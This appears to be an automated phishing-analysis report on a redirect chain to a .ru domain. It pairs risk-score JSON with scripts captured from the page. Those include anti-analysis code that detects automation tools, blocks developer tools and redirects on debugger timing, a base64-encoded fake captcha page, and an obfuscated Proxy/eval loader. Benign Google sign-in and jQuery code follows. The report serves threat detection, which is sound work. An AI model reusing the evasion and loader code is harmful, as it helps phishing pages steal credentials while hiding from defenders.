Windows Analysis Report
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4d

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (Google login page) after a delay. These behaviors are highly indicative of malicious intent, such as preventing analysis, obfuscating the script's purpose, and potentially attempting to steal user credentials."
}

if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
EFAYeykKOi = false;
(function wOKRlqEgYT() {
    let BxMsAQtHzp = false;
    const fjjWlNwBIi = 100;
    setInterval(function() {
        const nctEGlfDjy = performance.now();
        debugger;
        const QKBBpOTMCh = performance.now();
        if (QKBBpOTMCh - nctEGlfDjy > fjjWlNwBIi && !BxMsAQtHzp) {
            EFAYeykKOi = true;
            BxMsAQtHzp = true;
            window.location.replace('https://accounts.google.com/');
        }
    }, 100);
})();

{
    "risk_score": 5,
    "reasoning": "The script appears to have a mix of behaviors, some of which are potentially concerning. It uses base64 encoding to obfuscate a URL, which could be an attempt to hide malicious activity. However, the script also includes common web development practices like loading jQuery and setting meta tags. Without more context, it's difficult to determine the true intent of the script, so a medium risk score is assigned."
}

/* Success is not the absence of failure; it's the persistence through failure. */
if(atob("aHR0cHM6Ly8zSC52ZXJhY2lkZXAucnUvOXJRUTdwWVov") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90dG9tOiAwOw0KICAgIGJhY2tncm91bmQ6IHdoaXRlOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCiAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOiBjZW50ZXI7DQogICAgZmlsdGVyOiBibHVyKDVweCk7DQogICAgei1pbmRleDogLTE7DQp9DQouY29udGVudCB7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGp1c3RpZnktY29udGVudDogc3BhY2UtYmV0d2VlbjsNCiAgICBib3JkZXI6IDFweCBzb2xpZCAjMGYwZTBlOw0KICAgIHBhZGRpbmc6IDIwcHggMTBweDsNCiAgICB3aWR0aDogMzAwcHg7DQogICAgbWFyZ2luOiAyMHB4IGF1dG87DQogICAgYm9yZGVyLXJhZGl1czogNHB4Ow0KICAgIGJveC1zaGFkb3c6IDBweCAycHggNHB4IHJnYmEoMCwgMCwgMCwgMC4yKTsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IHsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGhlaWdodDogMjBweDsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXSB7DQogICAgZGlzcGxheTogbm9uZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggbGFiZWwgew0KICAgIGRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBjdXJzb3I6IHBvaW50ZXI7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrbWFyayB7DQogICAgd2lkdGg6IDIwcHg7DQogICAgaGVpZ2h0OiAyMHB4Ow0KICAgIGJvcmRlcjogMnB4IHNvbGlkICNkM2QzZDM7DQogICAgYm9yZGVyLXJhZGl1czogM3B4Ow0KICAgIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogICAgLyogbWFyZ2luLXJpZ2h0OiAxMHB4OyAqLw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAzcHggMDsNCiAgICB0cmFuc2Zvcm06IHJvdGF0ZSg0NWRlZyk7DQp9DQoNCi5jYXB0Y2hhLXRleHQgew0KICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsNCiAgICBmb250LXNpemU6IDE0cHg7DQogICAgbGVmdDogNnB4Ow0KICAgIGNvbG9yOiAjZmZmZmZmOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtbG9nbyBpbWcgew0KICAgIGhlaWdodDogNDBweDsNCiAgICB0b3A6IDBweDsNCiAgICByaWdodDogMDsNCiAgICBmbG9hdDogcmlnaHQ7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KfQ0KDQouY2FwdGNoYS1sb2FkZXIgew0KIGJhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTsNCiBib3JkZXI6NnB4IHNvbGlkICM0ZDkwZmU7DQogYm9yZGVyLXJhZGl1czozNnB4Ow0KIGJvcmRlci1ib3R0b20tY29sb3I6dHJhbnNwYXJlbnQ7DQogYm9yZGVyLXJpZ2h0LWNvbG9yOnRyYW5zcGFyZW50Ow0KIGhlaWdodDozNnB4Ow0KIG91dGxpbmU6MDsNCiBwb3NpdGlvbjpyZWxhdGl2ZTsNCiAvKnJpZ2h0OiAxODJweDsqLw0KIHdpZHRoOjM2cHg7DQogYm94LXNpemluZzpib3JkZXItYm94Ow0KIGFuaW1hdGlvbjogc3BpbiBsaW5lYXIgMXMgaW5maW5pdGU7DQogZGlzcGxheTogbm9uZTsNCn0NCg0KQGtleWZyYW1lcyBzcGluIHsNCiAgICAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDBkZWcpOyB9DQogICAgMTAwJSB7I

{
    "risk_score": 10,
    "reasoning": "This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10."
}

new Proxy({},{get:(_,n)=>eval([...n].map(n=>+("">n)).join``.replace(/.{8}/g,n=>String.fromCharCode(+("0b"+n))))}).

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://8fi5.veracidep.ru

{
  "contains_trigger_text": true,
  "trigger_text": "Click to verify",
  "prominent_button_name": "Click to verify",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

```json
{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. It does not exhibit any high-risk behaviors such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script primarily defines utility functions and prototypes for jQuery objects. As it interacts with trusted domains and serves a legitimate purpose, it is considered low risk."
}

/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s

{
  "brands": "unknown"
}

{
  "contains_trigger_text": true,
  "trigger_text": "Enter the result",
  "prominent_button_name": "Submit",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Google"
  ]
}

```json{  "legit_domain": "google.com",  "classification": "wellknown",  "reasons": [    "The brand 'Google' is well-known and typically associated with the domain 'google.com'.",    "The URL '8fi5.veracidep.ru' does not match the legitimate domain for Google.",    "The domain 'veracidep.ru' is unrelated to Google and uses a Russian domain extension, which is unusual for Google services.",    "The subdomain '8fi5' and the main domain 'veracidep' do not have any known association with Google.",    "The presence of a random subdomain and an unrelated main domain is a common tactic in phishing attempts."  ],  "riskscore": 9}
Google indexed: False

{
    "risk_score": 4,
    "reasoning": "The script appears to be related to user authentication and encryption management, which is a sensitive area. While there are no clear indicators of malicious intent, the script uses some potentially risky practices, such as interacting with the Chrome browser API and handling encryption keys. Further review may be necessary to ensure the script is not misusing or leaking sensitive user data."
}

"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_.k("iAskyc");
_.LX=function(a){_.Ct.call(this);this.window=a.Ga.window.get();this.uc=a.Ga.uc};_.J(_.LX,_.Fu);_.LX.Ca=function(){return{Ga:{window:_.Ou,uc:_.$C}}};_.LX.prototype.wq=function(){};_.LX.prototype.addEncryptionRecoveryMethod=function(){};_.MX=function(a){return(a==null?void 0:a.pq)||function(){}};_.NX=function(a){return(a==null?void 0:a.I5)||function(){}};_.iXb=function(a){return(a==null?void 0:a.Vq)||function(){}};
_.jXb=function(a){return new Map(Array.from(a,function(b){var c=_.n(b);b=c.next().value;c=c.next().value;return[b,c.map(function(d){return{epoch:d.epoch,key:new Uint8Array(d.key)}})]}))};_.kXb=function(a){setTimeout(function(){throw a;},0)};_.LX.prototype.dR=function(){return!0};_.OX=function(a,b,c,d){c=c===void 0?"":c;a=a.uc;var e=a.YQ,f=new _.SC;b=_.Nj(f,7,_.DWa,b==null?b:_.Tc(b));e.call(a,305,b,d,void 0,void 0,_.bWb(new _.RC,_.aWb(new _.iX,c)))};_.Ku(_.uo,_.LX);
_.l();
_.k("ziXSP");
var fY=function(a){_.LX.call(this,a.La)};_.J(fY,_.LX);fY.Ca=_.LX.Ca;fY.prototype.wq=function(a,b,c){var d;if((d=this.window.chrome)==null?0:d.setClientEncryptionKeys)_.MX(c)(),this.window.chrome.setClientEncryptionKeys(_.iXb(c),a,b);else{var e;((e=this.window.chrome)==null?0:e.setSyncEncryptionKeys)?(_.MX(c)(),d=WXb(b),b=b.get(_.XX()),this.window.chrome.setSyncEncryptionKeys(_.iXb(c),a,d,b[b.length-1].epoch)):_.NX(c)()}};
fY.prototype.addEncryptionRecoveryMethod=function(a,b,c,d,e){if(!(b.length>0)||b.includes(_.XX())){var f;(f=this.window.chrome)!=null&&f.addTrustedSyncEncryptionRecoveryMethod?(_.MX(e)(),this.window.chrome.addTrustedSyncEncryptionRecoveryMethod(_.iXb(e),a,_.YX(c),d)):_.NX(e)()}};fY.prototype.dR=function(){var a;return!((a=this.window.chrome)==null||!a.setClientEncryptionKeys)};var WXb=function(a){return a.get(_.XX()).map(function(b){return b.key})};_.Ku(_.uMa,fY);
_.l();
}catch(e){_._DumpException(e)}
}).call(this,this.default_AccountsSignInUi);
// Google Inc.

{
    "risk_score": 6,
    "reasoning": "The provided JavaScript snippet exhibits several behaviors that warrant a medium risk score. It includes features like dynamic code execution, data exfiltration, and aggressive DOM manipulation, which are considered moderate-risk indicators. However, the script also appears to have some legitimate use cases, such as analytics and telemetry functionality, which mitigates the overall risk. Further review may be necessary to determine the full context and intent of the script."
}

"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_.k("P6sQOc");
var p0a=!!(_.ei[0]>>28&1);var r0a=function(a,b,c,d,e){this.fa=a;this.Ba=b;this.oa=c;this.Da=d;this.Ea=e;this.aa=0;this.da=q0a(this)},s0a=function(a){var b={};_.Oa(a.qV(),function(e){b[e]=!0});var c=a.fV(),d=a.kV();return new r0a(a.kS(),c.aa()*1E3,a.JU(),d.aa()*1E3,b)},q0a=function(a){return Math.random()*Math.min(a.Ba*Math.pow(a.oa,a.aa),a.Da)},t0a=function(a,b){return a.aa>=a.fa?!1:b!=null?!!a.Ea[b]:!0};var u0a=function(){this.da=_.Iu(_.l0a);this.fa=_.Iu(_.j0a);var a=_.Iu(_.Z_a);this.fetch=a.fetch.bind(a)};u0a.prototype.aa=function(a,b){if(this.fa.getType(a.Yd())!==1)return _.Gn(a);var c=this.da.xX;return(c=c?s0a(c):null)&&t0a(c)?_.Aya(a,v0a(this,a,b,c)):_.Gn(a)};
var v0a=function(a,b,c,d){return c.then(function(e){return e},function(e){if(p0a)if(e instanceof _.xf){if(!e.status||!t0a(d,e.status.yc()))throw e;}else{if("function"==typeof _.Cs&&e instanceof _.Cs&&e.da!==103&&e.da!==7)throw e;}else if(!e.status||!t0a(d,e.status.yc()))throw e;return _.qf(d.da).then(function(){if(!t0a(d))throw Error("ne`"+d.fa);++d.aa;d.da=q0a(d);b=_.im(b,_.Pka,d.aa);return v0a(a,b,a.fetch(b),d)})})};_.Lu(u0a,_.o0a);
_.l();
}catch(e){_._DumpException(e)}
}).call(this,this.default_AccountsSignInUi);
// Google Inc.

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a part of a larger web application and does not contain any high-risk indicators. It uses some standard web development practices, such as DOM manipulation and event handling, which are common in legitimate web applications. The script also includes some functionality related to analytics and telemetry, which are generally considered low-risk behaviors. Overall, the script seems to be implementing common web application features without any clear signs of malicious intent."
}

"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_.Og(_.Iqa);
_.k("sOXFj");
var Ru=function(){_.Ct.call(this)};_.J(Ru,_.Fu);Ru.Ca=_.Fu.Ca;Ru.prototype.aa=function(a){return a()};_.Ku(_.Hqa,Ru);
_.l();
_.k("oGtAuc");
_.Cya=new _.Cf(_.Iqa);
_.l();
_.k("q0xTif");
var wza=function(a){var b=function(d){_.Io(d)&&(_.Io(d).Nc=null,_.gv(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(var c=0;c<a.length;c++)b(a[c])};_.rv=function(a,b){a&&_.Ef.hc().register(a,b)};_.sv=function(a){_.fv.call(this,a.La);var b=this,c=a.context.Aha;this.oa=c.Ir;this.qd=this.Pa=this.eb=this.Ba=null;this.Ma=a.Ga.Mc;this.Wa=a.Ga.Gpa;a=this.oa.oa.then(function(d){b.Ba=d;d=b.oa.id.v7(d,b.oa.getParams());b.eb=d.variant});c=c.A2.then(function(d){b.Pa=d});this.Ea=this.Ea.bind(this);this.Kj(_.Ki([a,c]))};_.J(_.sv,_.fv);_.sv.Ca=function(){return{context:{Aha:"FVxLkf"},Ga:{Mc:_.Pu,component:_.lv,Gpa:_.Cya}}};_.sv.prototype.aa=function(){return""};_.sv.prototype.Da=function(){return!1};
_.sv.prototype.Up=function(){return this.oa};var tv=function(a){var b=_.Fb(a.Pa,a.Ea);b={fb:a.oa.getParams(),Aga:a.oa.Da,ab:{V6:!1,fb:a.oa.getParams(),Jb:a.oa.id.Ea,XP:a.oa.xJ,Gb:a.aa(),jsdata:_.Gb(a.Ba)},oc:b,Yua:a.eb};Object.assign(b,a.Ba||{});Object.assign(b,a.oa.da);Object.assign(b.ab,a.oa.da);return b};_.sv.prototype.Ea=function(a,b){return Array.isArray(a)?a.length!=1||(b=this.oa.id.getChildren()[b],b&&b.oy)?_.Rf(a,function(c){return tv(c)}):tv(a[0]):tv(a)};_.sv.prototype.fa=function(){return null};
var xza=function(a){var b=a.da();return function(){var c=_.lb.apply(0,arguments);return a.Wa.aa(function(){return b.apply(null,_.Kh(c))})}},yza=function(a){var b=a.fa();return b?function(){var c=_.lb.apply(0,arguments);return a.Wa.aa(function(){return b.apply(null,_.Kh(c))})}:b};_.sv.prototype.render=function(){var a=tv(this),b=xza(this);b=this.Da()?zza(this,b,a):this.Qa.Fc(b,a);this.fa()&&(a=Aza(this,a),b.appendChild(a));(a=this.oa.id.pV())&&a.length>0&&a.forEach(function(){});this.oa.aa(b);return b};
var Aza=function(a,b){var c=a.dom.aa.aa.createElement("view-header");c.style.display="none";var d=yza(a);b={fb:a.oa.getParams()};a.Da()?a.Ma.wE(c,d,b):(a=a.Qa.mQ(d,b),c.appendChild(a));return c},zza=function(a,b,c){var d=a.dom.aa.aa.createElement("div");a.Ma.wE(d,b,c);return d.childNodes.length==1?d.firstChild:d};_.sv.prototype.vX=function(a){var b=tv(this),c=xza(this);wza(a);this.Ma.Yk(a,c,b);this.Up().aa(a);this.fa()&&(b=Aza(this,b),b=(new _.sp(b)).Nb(),_.wg(_.yg(a).body,_.vza,b))};_.rv(_.qv,_.sv);
_.l();
_.k("rv9FVb");
var OE=function(a){_.ME.call(this,a.La);this.mD=a.Ga.mD;this.oa.setBackButtonEnabled(!1);this.eb=!0;this.fa=a.Ga.uc;this.fa.Lb(307,64004,"page")};_.J(OE,_.ME);OE.Ca=function(){return{Ga:{mD:_.NE,uc:_.$C}}};OE.prototype.Cf=function(){_.ME.prototype.Cf.call(this);this.aa()};OE.prototype.Ba=function(){this.oa.setBackButtonEnabled(!0);this.da.restart()};
OE.prototype.aa=function(){var a=this,b;return _.$h(function(c){return(b=a.mD.da)?_.Rh(c,_.mw(a).Ob(function(){var d=a.Ta("H5iMZd").el(),e=_.vb(b,{Lna:!0});_.Be(d,e)}).build()(),0):c.return()})};_.X(OE.prototype,"TPiE3e",function(){return this.aa});_.X(OE.prototype,"UHZ0U",function(){return this.Ba});_.X(OE.prototype,"WYd",function(){return this.Cf});_.Z(_.UBa,OE);
_.l();
_.D1=function(a){var b=_.C,c=_.nk(a.Bd,15);a=_.U("mb",c!=null?c:null)(null,a);return b("<title>"+_.hq(a)+"</title>")};
_.T("Sb","",0,function(){return _.J_()});
_.T("Sb","",1,function(a){return a.U6?_.J_():""});
_.k("ZZ4WUe");
var F7b=function(a,b){var c=a.fb,d=_.C;a=a.ab;var e=_.C,f=(0,_.C)(""+_.N(_.dsa())),g=(0,_.C)(""+_.Jq({text:"",jsname:"H5iMZd"},b));c={U6:_.ik(c,1,!0)};c=_.U("Sb")(c,b);return d(_.K0({ab:a,jscontroller:"rv9FVb",jsaction:"jiqeKb:UHZ0U;rcuQ6b:WYd",content:e(""+_.L0({title:"Something went wrong",subtitle:f,Yc:g,Ed:c},b))},b))},G7b=function(a,b){return(0,_.C)(_.D1(b))},G1=function(a){_.sv.call(this,a.La)};_.J(G1,_.sv);G1.Ca=_.sv.Ca;G1.prototype.aa=function

{
    "risk_score": 4,
    "reasoning": "The provided JavaScript snippet contains a mix of behaviors that warrant a medium risk score. While it does not exhibit any high-risk indicators like dynamic code execution or data exfiltration, it does have some moderate-risk behaviors, such as external data transmission and aggressive DOM manipulation. Additionally, the use of legacy APIs like `XDomainRequest` contributes to the overall risk. However, the script appears to be related to analytics and user authentication functionality, which reduces the risk score. Further review may be necessary to determine the full context and intent of the script."
}

"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_.k("lOO0Vd");
_.j0a=new _.Cf(_.fma);
_.l();
_.k("ZDZcre");
var b1a=function(){this.Po=_.Iu(_.SE);this.C6=_.Iu(_.j0a);this.aa=_.Iu(_.RE)};b1a.prototype.execute=function(a){var b=this;a=this.aa.create(a);return _.Fb(a,function(c){var d=b.C6.getType(c.Yd())===2?b.Po.Ob(c):b.Po.fetch(c);return _.jm(c,_.TE)?d.then(function(e){return _.Ld(e)}):d},this)};_.Lu(b1a,_.hma);
_.l();
_.k("w9hDv");
_.Og(_.Yla);_.YA=function(a){_.Ct.call(this);this.aa=a.Ya.cache};_.J(_.YA,_.Fu);_.YA.Ca=function(){return{Ya:{cache:_.wt}}};_.YA.prototype.execute=function(a){_.Fb(a,function(b){var c;_.mf(b)&&(c=b.ib.hc(b.nb));c&&this.aa.qJ(c)},this);return{}};_.Ku(_.dma,_.YA);
_.l();
_.k("K5nYTd");
_.i0a=new _.Cf(_.ema);
_.l();
_.k("sP4Vbe");

_.l();
_.k("kMFpHd");

_.l();
_.k("A7fCU");
var m0a=function(a){_.Ct.call(this);this.aa=a.Ga.Lga};_.J(m0a,_.Fu);m0a.Ca=function(){return{Ga:{Lga:_.i0a,metadata:_.j0a},preload:{qJ:_.YA}}};m0a.prototype.execute=function(a){a=n0a(this,a);return this.aa.execute(a)};
var n0a=function(a,b){var c={};_.Fb(b,function(d,e){c[e]=d.ib.hc(d.nb);if(d.metadata){if(d.metadata.sideChannel)for(var f=_.n(d.metadata.sideChannel),g=f.next();!g.done;g=f.next())g=g.value,c[e]=_.zya(c[e],g.extension,g.message);if(d.metadata.kb)for(d=_.n(d.metadata.kb),f=d.next();!f.done;f=d.next())f=f.value,c[e]=_.im(c[e],f.key,f.value)}},a);return c};_.Ku(_.gma,m0a);
_.l();
}catch(e){_._DumpException(e)}
}).call(this,this.default_AccountsSignInUi);
// Google Inc.

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email or phone"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://accounts.google.com

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email or phone"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Google"
  ]
}

{
  "brands": [
    "Google"
  ]
}

```json
{
    "risk_score": 2,
    "reasoning": "The script includes a legacy practice of using an image ping for network status checking, which is outdated but not inherently malicious. It also involves some form of tracking or analytics behavior, but there are no high-risk indicators such as dynamic code execution or data exfiltration. The script interacts with a trusted domain (google.com), which further reduces the risk."
}

